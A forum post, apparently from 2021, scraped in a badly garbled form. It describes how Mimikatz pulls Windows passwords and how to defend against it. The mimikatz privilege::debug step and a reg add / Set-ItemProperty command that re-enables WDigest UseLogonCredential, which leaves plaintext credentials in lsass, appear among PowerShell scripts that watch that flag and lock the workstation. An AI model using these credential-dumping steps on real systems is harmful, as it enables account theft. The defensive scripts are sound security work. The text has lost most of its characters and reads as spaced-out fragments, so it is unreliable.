[18578] 2021-06-18_内网渗透了解和防御Mimikatz抓取密码的原理

文档创建者:s7ckTeam
浏览次数:2
最后更新:2025-01-18
2021-06-18_内网渗透了解和防御Mimikatz抓取密码的原理   |   M i m i k a t z   c k i n   H A C K   2 0 2 1 - 0 6 - 1 8 #   , 3 #   , 3 P r e f a c e 使 m i m i k a t z h a s h m i m i k a t z m i m i k a t z m i m i k a t z m i m i k a t z D e b u g   P r i v i l e g e   w i n d o w s     使 访 访 m i m i k a t z m i m i k a t z h a s h m i m i k a t z h a s h u s e r
w i n d o w s 使 w i n d o w s l o c a l   p o l i c y >   s i t e   p o l i c y >     d o m a i n   p o l i c y >   o u   p o l i c y A d m i n i s t r a t o r
使 p r i v i l e g e : : d e b u g p r i v i l e g e : : d e b u g
W D i g e s t m i m i k a t z W D i g e s t
? 使 w i n 2 0 0 8 w i n 2 0 0 8 ( I I S S S O ) W D i g e s t /   W i n d o w s   S e r v e r   2 0 0 3     L D A P     W e b   W D i g e s t W i n d o w s   访   M i m i k a t z   W D i g e s t m i m i k a t z W D i g e s t H T T P S A S L l s a s s . e x e h t t p W D i g e s t W D i g e s t W D i g e s t K B 2 8 7 1 9 9 7 K B 2 8 7 1 9 9 7 K B 2 8 7 1 9 9 7 W D i g e s t   A u t h W D i g e s t   A u t h W D i g e s t   A u t h W D i g e s t  
A u t h W D i g e s t   A u t h K B 2 8 7 1 9 9 7 U s e L o g o n C r e d e n t i a l W D i g e s t H K E Y _ L O C A L _ M A C H I N E S y s t e m C u r r e n t C o n t r o l S e t C o n t r o l S e c u r i t y P r o v i d e r s W D i g e s t U s e L o g o n C r e d e n t i a l

使 1 p o w e r s h e l l m i m i k a t z W D i g e s t U s e L o g o n C r e d e n t i a l r e g   a d d   H K L M S Y S T E M C u r r e n t C o n t r o l S e t C o n t r o l S e c u r i t y P r o v i d e r s W D i g e s t   / v   U s e L o g o n C r e d e n t i a l   / t   R E G _ D W O R D  
使 p o w e r s h e l l 1 0 1 1 0 s 0 退 使 p o w e r s h e l l 1 0 s 0 退 # ! b a s h S e t - I t e m P r o p e r t y   - P a t h   H K L M : S Y S T E M C u r r e n t C o n t r o l S e t C o n t r o l S e c u r i t y P r o v i d e r s W D i g e s t   - N a m e   U s e L o g o n C r e d e n t i a l # ! p o w e r s h e l l $ k e y = G e t - I t e m P r o p e r t y   - P a t h   " R e g i s t r y : : H K E Y _ L O C A L _ M A C H I N E S Y S T E M C u r r e n t C o n t r o l S e t C o n t r o l S e c u r i t y P r o v i d e r s W D i g e s t "   - N a m e   " $ F l a g = $ k e y . U s e L o g o n C r e d e n t i a l w r i t e - h o s t   " [ + ] C h e c k i n g   F l a g " w h i l e ( $ F l a g   - e q   1 ) {         w r i t e - h o s t   " [ + ] F l a g   N o r m a l "         w r i t e - h o s t   " [ + ] W a i t   1 0   S e c o n d s . . . "         S t a r t - S l e e p   - S e c o n d s   1 0         $ k e y = G e t - I t e m P r o p e r t y   - P a t h   " R e g i s t r y : : H K E Y _ L O C A L _ M A C H I N E S Y S T E M C u r r e n t C o n t r o l S e t C o n t r o l S e c u r i t y P r o v i d e r s W D i g e s t "   - N a m e   "         $ F l a g = $ k e y . U s e L o g o n C r e d e n t i a l         w r i t e - h o s t   " [ + ] C h e c k i n g   F l a g " } w r i t e - h o s t   " [ ! ] F l a g   C h a n g e d ! " p o w e r s h e l l . e x e   - E x e c u t i o n P o l i c y   B y p a s s   - F i l e   t e s t . p s 1
w i n d o w s w i n + L 使 w i n + L 使 c m d 使 c m d 使 p o w e r s h e l l r u n d l l 3 2 . e x e   u s e r 3 2 . d l l , L o c k W o r k S t a t i o n # ! p o w e r s h e l l F u n c t i o n   L o c k - W o r k S t a t i o n   { $ s i g n a t u r e   =   @ " [ D l l I m p o r t ( " u s e r 3 2 . d l l " ,   S e t L a s t E r r o r   =   t r u e ) ] p u b l i c   s t a t i c   e x t e r n   b o o l   L o c k W o r k S t a t i o n ( ) ; " @ $ L o c k W o r k S t a t i o n   =   A d d - T y p e   - m e m b e r D e f i n i t i o n   $ s i g n a t u r e   - n a m e   " W i n 3 2 L o c k W o r k S t a t i o n "   - n a m e s p a c e   W i n 3 2 F u n c t i o n s $ L o c k W o r k S t a t i o n : : L o c k W o r k S t a t i o n ( )   |   O u t - N u l l } L o c k - W o r k S t a t i o n p o w e r s h e l l . e x e   - E x e c u t i o n P o l i c y   B y p a s s   - F i l e   t e s t 2 . p s 1
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则